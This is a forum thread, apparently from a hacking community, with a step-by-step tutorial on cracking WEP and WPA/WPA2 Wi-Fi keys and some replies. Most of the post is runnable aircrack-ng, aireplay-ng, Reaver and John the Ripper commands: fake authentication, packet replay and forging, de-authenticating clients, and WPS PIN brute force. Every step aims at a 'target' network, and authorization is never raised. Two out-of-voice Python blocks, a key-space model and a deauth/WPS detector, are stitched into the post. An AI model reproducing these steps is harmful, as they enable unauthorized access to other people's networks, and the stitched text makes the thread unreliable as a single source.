WiFi 101
WiFi 101 #1
Hello HC, I know this has been covered before, but I thought I'd share my version of events, as it were.
For this tutorial you will need:
  • A laptop running a Linux OS; I will be using Back|track5 as it has all the tools needed already installed
  • The Aircrack-ng suite; if you don't have it, visit the website http://www.aircrack-ng.org
  • A wireless card capable of packet injection; again, visit the Aircrack website for a list of compatible hardware. I will be using an Alfa Networks AWUS036H USB adapter as it's cheap and offers good range
  • Reaver, a tool used to attack WPA2 secured routers
  • A decent sized wordlist
  • Patience

OK here we go.

WEP

I will be very surprised if you come across this any more as it's not very secure and most routers now use WPA2 by default but I will cover it anyway.

First put your card into monitor mode
Code:
ifconfig

Take note of your card's name; in my case it's wlan0.

Code:
airmon-ng start wlan0

should return something like:

Code:
Interface                                   Chipset             Driver
wlan0                                     Realtek RTL8187           rtl8187 - [phy1]
                                                                     (monitor mode enabled on mon0) <--- the bit we're interested in

Don't worry if it's not exactly the same, as some systems and hardware differ slightly; as long as you get monitor mode enabled you should be good to go.
What that does is put your card into sniffing mode, which lets us pick up beacons from the access point (AP). Now let's do some sniffing:

Code:
airodump-ng mon0

This will start to sniff for beacons and hop channels to pick up all the networks within range. It will return something like:
Code:
[CH11] [Elapsed: 5 min] [2012=07-18 23:55

BSSID                            PWR       Beacons      #Data    #/s     CH     MB       ENC    CIPER   AUTH    ESSID

00:11:22:33:44:55:66     -66          48                0         0        11    54e       WEP               PSK       TARGET
11:22:33:44:55:66:77     -69          17                0         0          6    54         OPN                           routername

BSSID                            STATION                    PWR      Rate            Lost                Frames            Probe

AA:BB:CC:DD:EE:FF:GG  00:11:22:33:44:55:66  -65         0-1              0                      26                 routername        <--- users connected to a network

That looks a bit messy, so we will pick our target from the list (usually a lot longer than 2) and sniff that network:

Code:
airodump-ng --bssid *TARGETS MAC ADDRESS* -c11 -w TARGET mon0


This will filter out everything else, display only the traffic of our target, and start to write a capture file in the current directory.
Next you will need to look at whether or not anyone is connected to the network, as this will determine the next step.

Leave that terminal running to continue the capture of packets. It is very important you do not stop this until you have the password, as this is the file used to crack the password. But we don't have enough packets, and it will take too long if we wait, so what do we do?

Let's speed this up a little bit and start generating some traffic. In a new terminal window enter:

Code:
aireplay-ng -1 0 -a *TARGETS MAC ADDRESS* -h *YOUR MAC ADDRESS* -e TARGET (AP name) mon0

To find your MAC address simply type:
Code:
macchanger mon0

What this does is send fake authentication packets to the target AP to trick it into thinking you are associated with it, allowing you to send your packets.

With a connected client

Once associated with the target, type this:

Code:
aireplay-ng -3 -b *TARGETS MAC ADDRESS* -h *YOUR MAC ADDRESS* mon0

What this does is capture traffic from the connected client and resend it over and over again, generating data for our capture file.
Leave this running and take a look at our capture window after a minute or so. Notice what happens to the #Data column: it will start to increase rapidly. Go grab a cup of coffee, you've earned it ;)
You will want to wait until you have around 10,000 packets captured (shouldn't take long).

Nearly there; now it's time to crack that password.

Open up yet another terminal and type:

Code:
aircrack-ng -b *TARGETS MAC ADDRESS* TARGET-01.cap  #(or whatever you called the capture file, airmon will always append a number to the end so be aware of this)

Now just sit back and wait. If you don't have enough packets to successfully decrypt the key, aircrack will fail and then wait for more packets, so it's just a matter of time, albeit usually a matter of seconds at this point, but it can take 10 minutes or so depending on signal strength.

Once found, aircrack will stop and display "KEY FOUND: [PA:SS:WO:RD]". Just drop the colons and log on to the network.

Clientless cracking

Again you will need to fake authenticate onto the network, but then it changes slightly: as there are no clients to capture traffic from and resend it, we will have to create our own.

Code:
aireplay-ng -5 -b *TARGETS MAC ADDRESS* -h *YOUR MAC ADDRESS* mon0

When aireplay returns a packet and asks if you would like to keep it, say yes and it will be saved as fragment.xor. Before we can use the packet we need to manipulate it and turn it into an ARP request.

Code:
packetforge-ng -0 -a *TARGETS MAC ADDRESS* -h *YOUR MAC ADDRESS* -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request

Start your capture file:

Code:
airodump-ng -c 11 -bssid *TARGETS MAC ADDRESS* --ivs -w filename mon0

and start throwing your forged packet at the AP in yet another console:

Code:
aireplay-ng -2 -r arp-request mon0

When aireplay finds our packet, say yes and it will start broadcasting. We are nearly done!

One more console:

Code:
aircrack-ng -n 64 -b *TARGETS MAC ADDRESS* filename.ivs

Sit back and wait again; it should crack the password in a few seconds.

With a little practice and a good signal you should be able to crack most WEP encryption keys in less than 5 minutes!

WPA/2

There are 2 ways to do this. First, my preferred method, as this proves to be more reliable.

Welcome reaver

Reaver targets the external registrar functionality mandated by the WiFi Protected Setup specification. Access points will provide authenticated registrars with their current wireless configuration (including the WPA PSK), and also accept a new configuration from the registrar.

In order to authenticate as a registrar, the registrar must prove its knowledge of the AP's 8-digit pin number. Registrars may authenticate themselves to an AP at any time without any user interaction. Because the WPS protocol is conducted over EAP, the registrar need only be associated with the AP and does not need any prior knowledge of the wireless encryption or configuration.

Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 100,000,000 possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10,000,000 possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10,000 possible values for the first half of the pin and 1,000 possible values for the second half of the pin, with the last digit of the pin being a checksum.

Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts. The speed at which Reaver can test pin numbers is entirely limited by the speed at which the AP can process WPS requests. Some APs are fast enough that one pin can be tested every second; others are slower and only allow one pin every ten seconds. Statistically, it will only take half of that time in order to guess the correct pin number, once the pin is guessed the AP will happily dump the plain text password to your console.

Brute forcing using this method can take anywhere from 10 minutes to 10 hours. Reaver will try the most common pins first and can be paused at any time by hitting Ctrl + C; this will stop the program and save its progress to be resumed at any time. Also, once Reaver has successfully found the pin it will save it, so even if the password is changed it can be recovered in a matter of seconds!
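The key-space figures quoted above (100,000,000 raw PINs, 10,000,000 once the checksum digit is fixed, 11,000 once the halves are validated separately) are what make WPS external-registrar PINs a risk worth disabling. As an added example that is not part of the original post or of Reaver, the Python below models that arithmetic together with the PIN checksum rule from the WPS specification (the same rule hostapd applies when generating a PIN); the AP response rates are the ones the post quotes.

```python
# Added example: a model of the WPS PIN key space described above, to check the
# numbers in the post (10^8 -> 10^7 -> 11,000). Not from the post or from Reaver.

def wps_pin_checksum(first_seven: int) -> int:
    """Checksum digit of a WPS PIN as defined in the WPS specification.
    `first_seven` is the integer value of the PIN's first seven digits."""
    accum, pin = 0, first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10

def is_valid_wps_pin(pin: str) -> bool:
    """True when an 8-digit PIN string carries the correct checksum digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])

def pin_key_space() -> dict:
    """Key-space sizes from the post. The protocol validates the first four
    digits on their own, then the next three (digit 8 is the checksum), so a
    guesser never has to search the product of the two halves."""
    first_half, second_half = 10 ** 4, 10 ** 3
    return {
        "naive": 10 ** 8,                                   # eight free digits
        "with_checksum": 10 ** 7,                           # last digit is determined
        "split_worst_case": first_half + second_half,       # 11,000
        "split_expected": (first_half + second_half) // 2,  # half, on average
    }

def worst_case_hours(seconds_per_attempt: float) -> float:
    """Hours to exhaust the split key space at a given AP response rate
    (the post quotes one PIN per second up to one PIN per ten seconds)."""
    return pin_key_space()["split_worst_case"] * seconds_per_attempt / 3600

if __name__ == "__main__":
    print(is_valid_wps_pin("12345670"))   # True: checksum of 1234567 is 0
    print(pin_key_space())
    print(round(worst_case_hours(1.0), 1), round(worst_case_hours(10.0), 1))
```

At one PIN per second the whole split key space is gone in about three hours; at one per ten seconds it is about thirty, which is why disabling WPS or its external-registrar PIN mode is the fix rather than hoping for a slow AP.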


First we need to put our card into monitor mode:
Code:
airmon-ng start wlan0

Next we check the AP is vulnerable to Reaver; luckily the package contains another handy tool:
Code:
wash -i mon0

or if you know the channel the target AP uses:
Code:
wash -i mon0 -c 11 -C -s               #If the AP is running on channel 11

The tool will filter APs and only display those vulnerable to the attack. Next we start reaver:
Code:
reaver -i mon0 -b *TARGETS MAC ADDRESS* -vv

That's all there is to it. Reaver will go do its thing; all you have to do is wait. If nothing happens or you get a lot of errors, you are too far from the AP; you will need to move closer or choose a different target.


NOTE:
For those with Kali Linux, Reaver doesn't work: there is a possibility of the "wash" command not working. You have to reinstall it:
1. wget http://reaver-wps.googlecode.com/files/r...1.4.tar.gz
2. tar -xzvf reaver-1.4.tar.gz
3. cd reaver-1.4
4. cd src
5. ./configure
6. make
7. make install
Credits to @"krypt3dkn1gh7" for providing the fix.

Aircrack method

There is no way of brute forcing the password using the aircrack suite, but you can still attack the AP with this method. However, it is slow and is not guaranteed to work, and there must be a client connected in order for this to work, as the attack needs to capture the four-way handshake (and the password hash), against which we will later attempt a dictionary attack.

Start up your card in monitor mode:
Code:
airmon-ng start wlan0

Start scanning for networks:
Code:
airodump-ng mon0

Once you find your target you will need to filter the sniffing and start a capture file:

Code:
airodump-ng -c (channel number) --bssid *TARGETS MAC ADDRESS* -w cap mon0

Now if there is a client connected, you will need to de-authorize them in order for them to reconnect so we can capture the handshake:
Code:
aireplay-ng -0 5 -a *TARGETS MAC ADDRESS* -c *connected client's mac address* mon0

This will send out de-authorization packets and hopefully knock them off the network. Once you have done this the capture window will display something like [ WPA handshake: 00:14:6C:7E:40:80 ] in the top right corner; you can now stop the capture and start attempting to crack the password:

Code:
aircrack-ng -w (full path to wordlist) -b *TARGETS MAC ADDRESS* cap-01.cap

BackTrack actually comes with quite a large wordlist located in:

Code:
/pentest/passwords/wordlists/darc0de.lst

But any will do, and that's it. aircrack will go through the words one by one and check them against the hash to see if they match. This is time consuming and not guaranteed to work: if their password isn't in your wordlist you will not crack it.

Or method 2: use JTR to feed words into aircrack to brute-force the password. This will work but could take years or even centuries:
Code:
john --incremental:alpha --stdout | aircrack-ng -0 *TARGETS MAC ADDRESS* -w- cap-01.cap
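Both the de-authorization step above and the Reaver PIN guessing from the WPA/2 section are loud on the air, and that noise is what a wireless IDS keys on. As an added example that is not part of the original post, this Python sketch flags both patterns in constructed frame records; the record layout, the frame-kind labels and the thresholds are assumptions chosen for illustration.

```python
from collections import defaultdict

# Constructed sample traffic: (seconds, frame_kind, bssid, client_mac).
# The frame_kind labels are an assumption for this example, not a capture format;
# a real deployment would fill them from a monitor-mode capture.
SAMPLE_FRAMES = [
    (0.0, "beacon", "AA:BB:CC:00:00:01", None),
    *[(1.0 + i * 0.02, "deauth", "AA:BB:CC:00:00:01", "DE:AD:BE:EF:00:01")
      for i in range(10)],                 # burst: the aireplay-ng -0 step
    *[(5.0 + i, "wps_m2", "AA:BB:CC:00:00:01", "CA:FE:00:00:00:01")
      for i in range(40)],                 # one registrar attempt per second
    (50.0, "deauth", "AA:BB:CC:00:00:02", "DE:AD:BE:EF:00:02"),  # lone, benign
]

def _exceeds_rate(stamps, window, threshold):
    """True if any `window`-second span holds at least `threshold` timestamps."""
    stamps = sorted(stamps)
    start = 0
    for end, ts in enumerate(stamps):
        while ts - stamps[start] > window:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False

def _pairs_over_rate(frames, kind, window, threshold):
    """(bssid, client) pairs whose frames of `kind` exceed the rate."""
    per_pair = defaultdict(list)
    for ts, frame_kind, bssid, client in frames:
        if frame_kind == kind:
            per_pair[(bssid, client)].append(ts)
    return {pair for pair, stamps in per_pair.items()
            if _exceeds_rate(stamps, window, threshold)}

def deauth_bursts(frames, window=2.0, threshold=5):
    """Pairs hit by a deauthentication burst. A replay tool sends dozens of
    frames per round; an AP dropping one client sends one or two."""
    return _pairs_over_rate(frames, "deauth", window, threshold)

def wps_bruteforce(frames, window=300.0, threshold=20):
    """Clients opening many WPS registrar exchanges (EAP-WSC M2) against one
    BSSID in five minutes. A real enrolment needs one; at the post's slowest
    rate of one PIN per ten seconds a brute force still produces about 30."""
    return _pairs_over_rate(frames, "wps_m2", window, threshold)

if __name__ == "__main__":
    print("deauth bursts:", deauth_bursts(SAMPLE_FRAMES))
    print("WPS brute force:", wps_bruteforce(SAMPLE_FRAMES))
```

Management-frame protection (802.11w) blunts the de-authorization step itself; the detector is for the APs and clients that cannot use it.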

If you get bored of typing all those MAC addresses you can use this little trick to speed things up. In each terminal you use, type in:
Code:
AP=*TARGETS MAC ADDRESS*
then
Code:
ATT=*YOUR MAC ADDRESS*

You can then use $AP and $ATT in place of the actual MAC addresses.

Next check out what you can do once you gain access with my Wireshark tutorial.
If you need help feel free to PM me

RE: WiFi 101 #2
Great tut. One thing: shouldn't the command in the Reaver instructions be wash instead of walsh?


RE: WiFi 101 #3
(06-21-2013, 01:44 AM)chupacabra Wrote: Great tut. One thing: shouldn't the command in the Reaver instructions be wash instead of walsh?

Edited to reflect the appropriate command structure to avoid any confusion.


RE: WiFi 101 #4
That's a great tutorial, brother, but may I ask how much time is required for Reaver to crack the PIN? I've failed several times with Reaver.

RE: WiFi 101 #5
It all varies; it could be almost instant or it could take 12 hours+. It depends a lot on luck, but having a strong signal really helps.

The good news is when you quit Reaver halfway through an attack it saves its progress, so you can resume it at your own leisure.

RE: WiFi 101 #6
I like the idea of Reaver, but after using the wash command and searching for APs I don't find any that are labeled as breakable. Aircrack for WPA just doesn't seem to work for me without the password being an actual word.


RE: WiFi 101 #7
The thing with Reaver is that it only works with setups using WPS. WPA is difficult to crack; there are other methods than those I've discussed here, but I didn't include them as it would take an age to write.

RE: WiFi 101 #8
For those with Kali Linux, reaver doesn't worrrrrrk
Haha wow... it still posted my comment after I tried stopping it :lol: What I was going to say was: for those with Kali, there is a possibility of the "wash" command not working. You gots to reinstall it? Maybe some of you know a different way, but the way I found was:
1. wget http://reaver-wps.googlecode.com/files/r...1.4.tar.gz
2. tar -xzvf reaver-1.4.tar.gz
3. cd reaver-1.4
4. cd src
5. ./configure
6. make
7. make install

Soo.. if you FEEL like throwing that in there to help some peeps and spoonfeed them with a choo-choo train, by all means haha
I was going to put this buuut... I decided to get some stuff to BBQ haha
[username], can you please open the curtain a little bit? I can't see inside from the bushes :/ Thank you!



RE: WiFi 101 #10
Can I use a modem for hacking WiFi with BackTrack?
Sorry, this is a stupid question, but I want to know.
